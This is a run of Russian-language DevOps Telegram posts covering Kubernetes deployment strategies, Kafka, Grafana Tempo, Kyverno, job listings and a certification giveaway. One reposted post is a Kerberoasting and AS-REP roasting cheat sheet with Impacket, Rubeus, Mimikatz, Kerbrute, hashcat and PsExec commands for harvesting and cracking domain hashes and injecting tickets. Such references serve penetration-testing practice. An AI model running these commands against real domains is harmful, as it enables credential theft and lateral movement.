Стратегии развертывания Kubernetes 👆

➖ Повторное создание (Recreate)

Сперва удаление текущей версии приложения, затем развертывание новой версии.

➖ Постепенное развертывание (Rolling)

Все инстансы приложения будут последовательно обновляться до новой версии.

➖ Сине-зеленое развертывание (Blue/Green)

Эта стратегия базируется на двух продуктивных средах: «синяя» — там, где живут старые версии приложения, и «зеленая» — зона, где мы запускаем новую версию приложения.

➖ Канареечное развертывание (Canary)

«Канареечный» деплой схож с зелено-синей стратегией. Часть текущих инстансов приложения заменяется новой версией, на которую переключается часть трафика.

➖ A/B testing

Обычно это стратегия принятия бизнес-решений на основе статистики. Она может быть реализована путем добавления к Canary дополнительной функциональности при определенных условиях. Например, куки браузера, язык или параметры запроса. Вместо того, чтобы открыть доступ к новой функции всем пользователям, ее предлагают лишь ограниченной их части.

➖ Shadow

Теневое развертывание заключается в выпуске версии 1.1 наряду с версией 1.0, перехвате входящих запросов с первой версии и отправке на вторую без влияния на трафик. Это особенно полезно для тестирования production нагрузки на новую функцию.

Каждая стратегия предлагает свой подход к управлению обновлениями.

#devops #kubernetes #k8s

@DevOpsKaz

🗣Внимание, конкурс!

Разыгрываем 7 ваучеров на бесплатное обучение и сертификацию от Cloud Native Computing Foundation. Ваучеры дают 100% скидку на курс или экзамен по Kubernetes из списка ниже до 23 февраля — и мы хотим ими поделиться:

🟣 CKA certification exam
🟣 CKAD certification exam
🟣 CKS certification exam
🟣 Обучение LFS258 Kubernetes Fundamentals
🟣 Обучение LFS260 Kubernetes Security Essentials
🟣 Обучение LFD259 Kubernetes для разработчиков
🟣 Пакет LFS258+CKA (обучение + экзамен)
🟣 Пакет LFD259+CKAD (обучение + экзамен)
🟣 Пакет LFS260+CKS (обучение + экзамен)

Мы хотим, чтобы сообщество DevOps развивалось, поэтому условия розыгрыша просты.

🔵 Подпишитесь на KazDevOps и оставьте комментарий с профилем коллеги (@username) из DevOps и смежных сфер под этим постом.

🚩 Комментарий обязательно оставлять в официальном аккаунте KazDevOps

🥳 13 ноября подведем итоги и выберем 7 победителей методом генерации случайных чисел. Каждый получит по ваучеру. Go-go-go, и успехов!

#kubernetes #cka #ckad #cks #k8s #linuxfoundation #cncf

@DevOpsKaz

☄️ Шпаргалка по дизайну-системы, у которой более 42 тысяч звёзд на GitHub — это вам не шутки 😉

Она будет интересна всем, кто хоть как-то связан с разработкой ПО. Добавив её в закладки, вы получите огромную библиотеку о таких вещах, как:

➖ протоколы коммуникации
➖ DevOps, CI/CD
➖ архитектурные паттерны
➖ базы данных
➖ кэширование
➖ микросервисы (и монолиты)
➖ платежные системы
➖ облачные сервисы и так далее

Особо хвалят диаграммы.

🚩 Ещё одна приятная новость в том, что она есть и на русском. Пользуйтесь и делитесь с коллегами!

#devops #cheatsheet

@DevOpsKaz

Kerberoast. Когда крадешь билеты на концерт, но не знаешь, как их использовать.
Kerberoast - это метод атаки, который используется для получения хешей паролей пользователей в Windows домене, которые будет возможно сбрутить в оффлайн режиме.

➡️ Инструменты:
Rubeus
Kerbrute
Impacket
PsExec

➡️ ASREP-Roast

➡️ Impacket
Проверка ASREP для всех пользователей домена (Требуются валидные данные учетной записи)

python2 GetNPUsers.py <Domain>/<User>:<Password> -request -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"

ㅤ
Проверка ASREP по списку пользователей домена (не требует доменных учетных данных)

python2 GetNPUsers.py <Domain> -usersfile <UserList>  -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"

ㅤ
➡️ Rubeus
Извлечение из всех учетных записей домена

.\Rubeus.exe asreproast
.\Rubeus.exe asreproast /format:hashcat /outfile:C:Hashes.txt

ㅤ
➡️ Cracking
Windows

hashcat64.exe -m 18200 c:Hashes.txt rockyou.txt

​
Linux

john --wordlist rockyou.txt Hashes.txt --format=krb5tgs
hashcat -m 18200 -a 3 Hashes.txt rockyou

ㅤ
➡️ Brute Force

➡️ Kerbrute

./kerbrute userenum <UserList> --dc <IP> --domain <Domain>

ㅤ
➡️ Rubeus
со списком пользователей

.\Rubeus.exe brute /users:<UserList> /passwords:<Wordlist> /domain:<Domain>

ㅤ
Kerberos-based Password Spraying

.\Rubeus.exe brute /passwords:<Wordlist>

ㅤ
➡️ Kerberoasting

➡️ Impacket

GetUserSPNs.py <Domain>/<User>:<Password> -dc-ip <IP> -request

ㅤ
➡️ Rubeus
Kerberoast всех пользователей домена

.\Rubeus kerberoast

ㅤ
Все пользователи в поздразделении OU

.\Rubeus.exe kerberoast /ou:OU=Service_Accounts,DC=Security,DC=local

ㅤ
Атака на конкретных пользователей

.\Rubeus.exe kerberoast /user:File_SVC

ㅤ
➡️ Pass-The-Ticket

➡️ Mimikatz
Сбор тикетов

sekurlsa::tickets /export

​
Инжект тикета

kerberos::ptt <.kirbi file>

​
Создать CMD с инжектированным тикетом

misc::cmd

ㅤ
➡️ Rubeus
Дамп тикетов

.\Rubeus.exe dump

​
Инжект тикета

.\Rubeus.exe ptt /ticket:<.kirbi file>

ㅤ
➡️ PsExec
Используется после инъекции тикетов через Rubeus или Mimikatz

.\PsExec.exe -accepteula \\<IP> cmd

ㅤ
🌚 @poxek

Grafana Tempo — инструмент трассировки с открытым исходным кодом. И на днях состоялся релиз версии 2.3. Рассказываем, что это и почему важно.

🚩 Немного справки: для его работы требуется только объектное хранилище, типа Google Cloud Storage или Amazon S3. Он позволяет принимать, записывать и хранить полные пути чтения наших производственных и тестовых окружений, а также окружений для разработки. Совместим с OpenTelemetry и Opentracing и интегрируется с другими инструментами, вроде Prometheus.

🚩 Что нового в Tempo 2.3:

➖ гораздо более производительные запросы TraceQL
➖ задержка поиска сильно сокращена за счёт новой версии бэкенда
➖ новые структурные операторы: например, для поиска фрагментов HTTP-запросов
➖ функция, которая показывает, какие ошибки или сообщения возникают в вашем кластере
➖ полная поддержка атрибутов OpenTelemetry

🤝 Дальше — еще круче. Делитесь с коллегами!

#devops #grafana #trace #grafanatempo #opentelemetry

@DevOpsKaz

☄️ Подборка вакансий на выходные

➖ DevOps инженер, eCapital, 1 500$, Алматы

➖ DevOps инженер, eCapital, 1 500$, Астана

➖ DevOps / Системный администратор Linux (middle/senior) Плейтокс (Playtox), По договоренности, Астана

➖ Специалист Middle по .NET Core со знанием DevOps, ЧАСТНАЯ КОМПАНИЯ WELLDONE SCHOOL LTD, От 1 700$ до 2 600$, Алматы

➖ DevOps Engineer (AWS), Andersen, По договоренности, Алматы

➖ DevOps engineer (Cruise company project), RemoteMaxiru, От 2 900$ до 5 000$, Астана

➖ DevSecOps, Мобайл Телеком-Сервис (Объединенная Компания Tele2/ALTEL), По договоренности, Алматы

#devops #DevOpsИнженер #sre #cv

@DevOpsKaz

Недавно прошел Data Platform Meetup Kazakhstan, на котором эксперты Yandex Cloud рассказали о технологических трендах ближайших лет и задачах, в которых компаниям помогают сервисы для работы с данными.

Вот самые ключевые выводы:

🟣Демократизация машинного обучения для разных ролей и индустрий — главный тренд. Массивы данных помогают обучать модели ML, а развитие NLP позволяет применять их в аналитике: отзывы клиентов, данные социальных сетей и онлайн-обзоры.

🟣Гибкая платформа данных позволяет бизнесу быстро запускать дата-проекты и быть максимально адаптивным к любым изменениям. Многие компании всё чаще используют облако как гибкую среду для построения корпоративных хранилищ.

🟣Рост спроса на безопасность и контроль данных, а также запрос на простоту работы с BI-инструментами. Компании активно тестируют и внедряют бизнес-аналитику, требуя качественный UI, доступную техподдержку и возможность получать данные в режиме реального времени.

Особенно радует нас то, что казахстанские компании активно применяют сервисы Data Platform для речевой аналитики, разработки голосовых роботов, систем видеоаналитики и рекомендательных сервисов.

#devops #data #bi #dataops #dataplatform

@DevOpsKaz

Kafka — это мощный инструмент, который помогает работать с данными в реальном времени. Предлагаем 6 вариантов, как его использовать на максимум.

👉 Для наглядности держите гифку.

1️⃣ Агрегирование журналов
— Собирает журналы из разных источников и упрощает их анализ
— Надежно и эффективно хранит эти журналы
— Помогает работать с большими объемами данных журналов

2️⃣ Потоковая передача данных
— Позволяет анализировать данные по мере их генерации
— Дает возможность быстро перемещать данные по системе
— Обеспечивает бесперебойную и непрерывную передачу данных

3️⃣ Очередь сообщений
— Надежно хранит сообщения и доставляет их в нужное место
— Следит за тем, чтобы все сообщения были доставлены, даже если есть проблемы с системой
— Позволяет различным частям системы взаимодействовать друг с другом независимо друг от друга

4️⃣ Репликация данных
— Делает бэкап
— Делает вашу систему более устойчивой к сбоям
— Распределяет данные между различными кластерами для повышения производительности

5️⃣ Сбор данных об изменениях
— Отслеживает изменения в ваших данных и сообщает о них другим системам
— Синхронизирует все системы друг с другом
— Помогает поддерживать целостность данных в динамических средах

6️⃣ Мониторинг и оповещение
— Собирает анализирует системные метрики в режиме реального времени
— Отправляет оповещения при возникновении проблем
— Сохраняет метрики для последующего анализа, чтобы вы могли улучшить свою систему

#data #dataanalytics #kafka #apache #devops

@DevOpsKaz

Типичные ошибки конфигурации безопасности #kubernetes:

1️⃣ Чрезмерные привилегии. Если вы предоставляете избыточные разрешения контейнерам или модулям, то это может привести к несанкционированному доступу.

2️⃣ Неадекватные сетевые политики. Неспособность определить сетевые политики приводит к неограниченной связи между подами, открывая путь для злоумышленников.

3️⃣ Отсутствие ограничений на ресурсы. Ресурсоемкие приложения могут использовать значительную часть инфраструктуры кластера, что часто приводит к нехватке памяти (OOM).

4️⃣ Чрезмерно допустимые конфигурации RBAC. Когда она предоставляет пользователям или группам больше разрешений, чем необходимо для их задач.

5️⃣ Неправильная конфигурация секретов. Неправильные права доступа, небезопасные методы хранения могут привести к угрозе безопасности и раскрытию конфиденциальных данных.

🫡 Чтобы всё работало правильно, мы в Core 24/7 предлагаем провести аудит ваших кластеров,исправить ошибки или настроить с нуля.

@DevOpsKaz

☄️ Kyverno — приложение для управления политиками безопасности Kubernetes.

Политики безопасности представлены в Kyverno как ресурсы Kubernetes. Они способны проверять, изменять, генерировать и очищать ресурсы Kubernetes, а также проверять подписи образов и артефакты, чтобы обеспечить безопасность цепочки поставок ПО.

🚩 По сути Kyverno позволяет администраторам кластеров управлять специфическими конфигурациями среды независимо от конфигураций ресурсов, применять передовые методы настройки для своих кластеров. Kyverno можно использовать для сканирования существующих ресурсов на наличие best practises или для соблюдения их путем блокировки или изменения запросов API.

Есть и json-версия, которую можно запускать как CLI или веб-приложение с REST API.

Пользуйтесь и делитесь с коллегами 🤝

#devops #cli #kyverno #git #k8s #kubernetes

@DevOpsKaz